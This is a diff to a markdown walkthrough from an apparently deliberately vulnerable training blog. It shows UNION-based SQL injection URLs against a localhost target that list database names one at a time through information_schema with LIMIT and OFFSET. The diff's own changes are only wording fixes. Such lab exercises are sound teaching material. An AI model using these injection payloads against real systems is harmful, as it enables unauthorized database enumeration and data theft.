gbuszmicz/insecure-blog-project/challenges/SQLi/d.Get_all_databases.md

 http://localhost:8080/p/2 UNION SELECT 1,(SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 1),3,4,5,6,7,8,9/slug-name-post'
 ```

 With this OFFSET trick we are skipping the first database and getting the second one.
-Then we skip another one:
+Then we skip another one to get the next one:
 ```shell
 http://localhost:8080/p/2 UNION SELECT 1,(SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 2),3,4,5,6,7,8,9/slug-name-post'
 ```

 We keep skipping until getting all the databases.

 And that is it!!
-Mission accomplish!
+Mission accomplished!